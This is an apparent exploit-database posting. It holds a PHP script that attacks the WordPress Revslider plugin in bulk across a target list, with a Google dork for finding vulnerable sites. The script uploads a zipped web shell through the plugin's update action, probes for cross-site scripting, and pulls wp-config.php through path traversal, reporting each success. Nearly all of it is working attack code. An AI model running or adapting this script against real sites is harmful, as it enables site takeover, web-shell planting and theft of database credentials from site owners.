##################################################################################### # Exploit Title : WordPress Revslider Arbitrary File Upload, Download & Cross Site Scripting # Google Dork : inurl:"/wp-content/plugins/revslider/" # Date : 21-06-2015 # Exploit Author : CaFc Versace # Vendor Homepage : http://revolution.themepunch.com/ # Tested on : Windows 7 # Contact : cafc.versace[@]surabayablackhat.org; me[@]dwisiswanto.my.id ##################################################################################### # Exploit & PoC : ------------------------------------------------------------------------------------- "revslider.zip", // enter a ur shell file into a zip "xss"=>"CaFc Versace was Here", // for xss "kfg"=>"..\wp-config.php" // for download config ); function hajar($yuerel, $dataAing=null) { $cuih = curl_init(); curl_setopt($cuih, CURLOPT_URL, $yuerel); if ($dataAing != null){ curl_setopt($cuih, CURLOPT_POST, true); curl_setopt($cuih, CURLOPT_POSTFIELDS, $dataAing); } curl_setopt($cuih, CURLOPT_FOLLOWLOCATION, true); curl_setopt($cuih, CURLOPT_RETURNTRANSFER, true); curl_setopt($cuih, CURLOPT_SSL_VERIFYPEER, false); $eks = curl_exec($cuih); curl_close($cuih); return $eks; } $site = @file_get_contents($argv[1]); $tumbal = explode("\r\n", $site); echo "Calculate the target list : " . count($tumbal); if (!isset($site)) { echo "Site N/A."; } else { foreach ($tumbal as $uri) { echo "\n------------------------------------"; echo "\nTarget => " . $uri; echo "\n"; $menta = hajar($uri . "/wp-admin/admin-ajax.php", array( "action" => "revslider_ajax_action", "client_action" => "update_plugin", "update_file" => $cafc['file']) ); $jason = json_decode($menta, true); if ($jason['success'] == false || $jason['message'] == "Wrong request") { echo "\nExploit [update_plugin] => NOT VULNERABLE"; } else { echo "\nExploit [update_plugin] => SUCCESS"; echo "\n[+] " . $uri . "/wp-content/plugins/revslider/temp/update_extract/revslider/YOUR_FILE.php\n"; } $menta2 = hajar($uri . "/wp-admin/admin-ajax.php", array( "action" => "revslider_ajax_action", "client_action" => "get_captions_css", "data" => $cafc['xss']) ); $jasonB = json_decode($menta2, true); if ($jasonB['success'] == false || $jason['message'] == "Wrong request") { echo "\nExploit [get_captions_css] => NOT VULNERABLE"; } elseif ($jasonB['success'] == true) { echo "\nExploit [get_captions_css] => SUCCESS"; echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?"; echo "action=revslider_ajax_action&"; echo "client_action=get_captions_css"; echo "data=" . urlencode($cafc['xss']) . "\n"; } $menta3 = hajar($uri . "/wp-admin/admin-ajax.php", array( "action" => "revslider_ajax_action", "client_action" => $cafc['xss']) ); $jasonC = json_decode($menta3, true); if (preg_match("/wrong ajax action/i", $jasonC['message'])) { echo "\nExploit [xss] => SUCCESS"; echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?"; echo "action=revslider_ajax_action"; echo "client_action=" . urlencode($cafc['xss']) . "\n"; } else { echo "\nExploit [xss] => NOT VULNERABLE"; } $menta4 = hajar($uri . "/wp-admin/admin-ajax.php", array( "action" => "revslider_show_image", "img" => $cafc['kfg']), $uri); if ($menta4 == "empty image" || $menta4 == "image file not found" || $menta4 == 0) { echo "\nExploit [wp-config] => NOT VULNERABLE\n"; } else { echo "\nExploit [wp-config] => SUCCESS"; echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?"; echo "action=revslider_show_image"; echo "img=" . $cafc['kfg'] . "\n"; } } } ?> ------------------------------------------------------------------------------------- # Credits : ------------------------------------------------------------------------------------- CaFc Versace Thanks : Agency CaFc - Surabaya BlackHat ------------------------------------------------------------------------------------- ./learn to be better